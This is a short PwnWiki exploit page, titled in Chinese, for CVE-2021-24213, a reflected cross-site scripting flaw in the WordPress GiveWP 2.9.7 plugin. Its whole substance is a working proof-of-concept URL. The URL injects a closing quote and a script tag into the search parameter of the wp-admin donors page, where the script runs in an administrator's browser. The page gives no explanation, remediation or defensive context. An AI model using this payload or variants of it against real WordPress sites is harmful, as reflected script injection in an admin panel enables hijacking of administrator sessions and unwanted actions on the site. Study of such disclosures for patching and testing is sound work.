CVE-2021-24213 WordPress GiveWP 2.9.7 反射型XSS漏洞

From PwnWiki
Revision as of 10:01, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&ord...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors